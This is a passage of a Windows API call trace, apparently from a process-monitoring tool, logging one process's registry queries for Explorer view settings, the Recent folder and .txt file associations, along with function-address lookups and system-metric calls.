SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 1 ValueName => WebView |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 0 ValueName => Filter |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => ShowSuperHidden Type => 517436 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 0 ValueName => SeparateProcess |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => NoNetCrawling Type => 517436 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ca SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ca SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000d2 Registry => 0x80000000 SubKey => Folder |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000d2 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca DataLength => 2 ValueName => AlwaysShowExt Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 388 FunctionName => FunctionAddress => 0x773e1535 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000ca |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000d2 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCreateKeyExW |
Handle => 0x000000c8 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c8 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00R\x00e\x00c\x00e\x00n\x00t\x00\x00\x00 ValueName => Recent |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c8 Registry => 0x000000c4 SubKey => FileExts |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000d4 Registry => 0x000000c8 SubKey => .txt |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000d4 DataLength => 128 ValueName => Progid Type => 515596 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000d4 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000d4 Registry => 0x000000c8 SubKey => .txt |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000d4 DataLength => 128 ValueName => Application Type => 515596 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000d4 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 326 FunctionName => FunctionAddress => 0x773e0cc1 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000d6 Registry => 0x80000000 SubKey => .txt |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000d6 Data => t\x00x\x00t\x00f\x00i\x00l\x00e\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000da Registry => 0x80000000 SubKey => txtfile |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000da SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000de Registry => 0x000000da SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000da |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000de SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => SystemFileAssociations\.txt |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000da Registry => 0x80000000 SubKey => .txt |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000da Data => t\x00e\x00x\x00t\x00\x00\x00 ValueName => PerceivedType |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000da |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000da Registry => 0x80000000 SubKey => SystemFileAssociations\text |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000da SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000de DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000da DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000de DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000da DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000de SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000da SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000e2 Registry => 0x80000000 SubKey => * |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e2 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000de DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW |
Handle => 0x000000da DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW |
Handle => 0x000000de DataLength => 0 ValueName => AlwaysShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW |
Handle => 0x000000da DataLength => 0 ValueName => AlwaysShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW |
Handle => 0x000000de DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW |
Handle => 0x000000da DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegCloseKey |
Handle => 0x000000d6 |
SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey |
Handle => 0x000000de |
SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey |
Handle => 0x000000da |
SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey |
Handle => 0x000000e2 |
SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 7 times |
| 19:40:26,714 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetThemeInt FunctionAddress => 0x5ad7459d ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DrawThemeBackground FunctionAddress => 0x5ad72bef ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:27,365 | 968 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 7 times |